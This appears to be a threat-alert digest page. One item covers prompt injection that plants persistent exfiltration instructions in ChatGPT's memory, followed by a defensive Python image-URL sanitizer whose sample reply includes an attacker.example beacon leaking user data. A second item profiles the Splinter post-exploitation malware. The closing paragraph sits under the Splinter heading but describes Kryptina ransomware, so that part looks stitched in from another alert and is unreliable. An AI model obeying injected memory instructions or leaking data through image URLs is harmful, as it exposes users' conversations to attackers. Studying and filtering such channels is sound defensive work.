Threat Alerts
Spyware Injection Employed for Data Exfiltration on ChatGPT
Researchers have drawn attention to a rise in threat actors using prompt injection from untrusted data to implant long-lasting spyware into ChatGPT’s memory. This enables ongoing exfiltration of any information the user inputs or receives from ChatGPT, including in future chat sessions.
This exfiltration method isn’t new: it typically involves instructing ChatGPT to render an image hosted on an attacker-controlled server and to include the user’s data in the image URL as a query parameter.
The process begins when a user interacts with an untrusted document or visits a compromised website. The document or site contains instructions that take control of ChatGPT, embedding malicious code in its memory to extract future chat data and send it to the attacker. As the user continues to use ChatGPT, the data is silently transmitted to the attacker, who can then retrieve all future information.
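A defender-side mitigation for the image-rendering channel described above, written here as an added example and not code from the original alert: it rewrites an assistant reply so that only images from allow-listed hosts are rendered, and records the blocked hosts and query parameter names as detection evidence. The allow-list host and the sample reply are constructed for this example.

```python
import re
from urllib.parse import urlparse, parse_qsl

# Constructed allow-list for this example: image hosts the client may render.
# A real deployment would take this from the client's configuration.
ALLOWED_IMAGE_HOSTS = {"static.example.org"}

# Markdown image syntax: ![alt](url). Rendering clients fetch `url` automatically,
# which is what turns an injected image into a zero-click exfiltration beacon.
MD_IMAGE = re.compile(r"!\[([^\]]*)\]\(([^)\s]+)\)")


def inspect_images(assistant_output: str):
    """Rewrite the model's reply so only allow-listed image URLs are rendered.

    Returns (sanitized_text, findings). Each finding records the blocked host
    and the query parameter names, which is where injected instructions
    typically stash the user's data.
    """
    findings = []

    def _check(match):
        url = match.group(2)
        parsed = urlparse(url)
        host = (parsed.hostname or "").lower()
        params = parse_qsl(parsed.query, keep_blank_values=True)
        if parsed.scheme in ("http", "https") and host in ALLOWED_IMAGE_HOSTS:
            return match.group(0)  # trusted host: leave the image untouched
        findings.append({
            "host": host or "(none)",
            "query_params": [name for name, _ in params],
            "query_bytes": len(parsed.query),
        })
        # Replace the image with plain text so no request is ever issued.
        return f"[image blocked: {host or 'invalid URL'}]"

    return MD_IMAGE.sub(_check, assistant_output), findings


# Constructed sample reply: one benign image plus one smuggled exfiltration beacon.
SAMPLE_REPLY = (
    "Here is the chart you asked for:\n"
    "![chart](https://static.example.org/chart.png)\n"
    "Thanks! ![](https://attacker.example/i.png?d=user%20mentioned%20project%20Falcon)"
)

if __name__ == "__main__":
    text, hits = inspect_images(SAMPLE_REPLY)
    print(text)
    print(hits)
```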
Splinter: A Rust-based Post-Exploitation Framework with Advanced Capabilities
Splinter is a sophisticated post-exploitation tool developed in Rust, a programming language known for its emphasis on memory safety. The malware utilizes a JSON-based configuration structure containing essential operational details, and upon execution, it parses this data to establish a connection with the attacker’s command-and-control (C2) server over HTTPS using login credentials. Once connected, Splinter is controlled by a task-based model, allowing attackers to issue various post-exploitation commands. Its functionality includes executing Windows commands, injecting modules via remote process injection, file transfers, cloud account data collection, and self-deletion from the compromised system.
Splinter leverages several notable post-exploitation features. It can execute Windows commands, upload and download files, inject modules into remote processes, and gather sensitive information from cloud service accounts. For communication with its C2 server, Splinter uses specific URL paths to handle task synchronization, status updates, and file transfers. All communication is encrypted via HTTPS, providing a secure channel for the malware to receive instructions and upload stolen data. Additionally, it utilizes the classic process injection technique to run additional modules. This architecture allows Splinter to maintain persistence and covert control over compromised systems.
The impact of this attack is significant, as both Linux and Windows systems are affected by the encryption of vital files, leading to system inoperability and potential data loss. The automation provided by the Kryptina platform allows attackers to scale their campaigns efficiently, targeting multiple victims simultaneously with customized ransomware builds. This streamlined infection chain — from initial access to payload deployment and file encryption — enables threat actors to maximize the damage and financial impact on enterprises. The ability to seamlessly integrate Kryptina’s modular architecture into both Linux and Windows environments further complicates defense efforts, as attackers can easily adapt their tools to evade detection and ensure the success of their campaigns.